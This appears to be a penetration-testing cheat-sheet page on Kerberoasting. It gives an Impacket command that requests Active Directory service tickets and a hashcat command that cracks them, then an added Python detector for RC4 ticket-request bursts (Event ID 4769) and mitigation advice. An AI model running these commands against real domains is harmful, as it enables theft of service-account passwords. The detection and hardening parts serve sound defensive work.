Kerberoasting

A domain user is required to perform this attack.

NOTE:

The service ticket file is binary. Keep this in mind when transferring it with a tool like Netcat, which may mangle it during transfer.

Get SPNs with Impacket

impacket-GetUserSPNs -dc-ip '<DC ip>' -request '<FQDN>/<USERNAME>'

Crack with hashcat

hashcat -m 13100 kerberoasting-hashes.txt '<WORDLIST>'
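Detecting this on the domain controller (an added example, not part of the original page): hashcat mode 13100 targets RC4 (etype 23) service tickets, so a burst of Event ID 4769 requests with TicketEncryptionType 0x17 from one account for several user-backed services is the usual signal. The sample events, the 5-minute window and the threshold of 3 are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                  # etype 23, the ticket type hashcat -m 13100 cracks
WINDOW = timedelta(minutes=5)    # assumed correlation window
THRESHOLD = 3                    # assumed: distinct services per source within WINDOW

# Constructed sample of Event ID 4769 records, reduced to the fields used here.
FIELDS = ("time", "TargetUserName", "ServiceName", "TicketEncryptionType", "IpAddress")
EVENTS = [dict(zip(FIELDS, row)) for row in [
    ("2024-05-01T10:00:01", "jdoe@CORP.EXAMPLE", "svc_sql", "0x17", "::ffff:10.0.0.50"),
    ("2024-05-01T10:00:02", "jdoe@CORP.EXAMPLE", "svc_web", "0x17", "::ffff:10.0.0.50"),
    ("2024-05-01T10:00:02", "jdoe@CORP.EXAMPLE", "svc_backup", "0x17", "::ffff:10.0.0.50"),
    ("2024-05-01T10:00:03", "jdoe@CORP.EXAMPLE", "DC01$", "0x17", "::ffff:10.0.0.50"),
    ("2024-05-01T10:07:00", "asmith@CORP.EXAMPLE", "svc_web", "0x12", "::ffff:10.0.0.61"),
    ("2024-05-01T11:30:00", "asmith@CORP.EXAMPLE", "svc_sql", "0x17", "::ffff:10.0.0.61"),
]]

def is_candidate(ev):
    """RC4 ticket for a user-backed service (not a machine account or krbtgt)."""
    svc = ev["ServiceName"]
    return (int(ev["TicketEncryptionType"], 16) == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def detect(events, window=WINDOW, threshold=THRESHOLD):
    """Return {(account, ip): sorted services} for bursts of RC4 ticket requests."""
    by_source = defaultdict(list)
    for ev in filter(is_candidate, events):
        by_source[(ev["TargetUserName"], ev["IpAddress"])].append(
            (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    alerts = {}
    for source, reqs in by_source.items():
        reqs.sort()
        # Slide a window from each request and count distinct services inside it.
        for i, (start, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                alerts[source] = sorted(services)
                break
    return alerts

if __name__ == "__main__":
    for (account, ip), services in detect(EVENTS).items():
        print(f"{account} from {ip}: RC4 tickets for {', '.join(services)}")
```

Service accounts restricted to AES encryption types and given long random passwords remove most of what this attack can recover.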
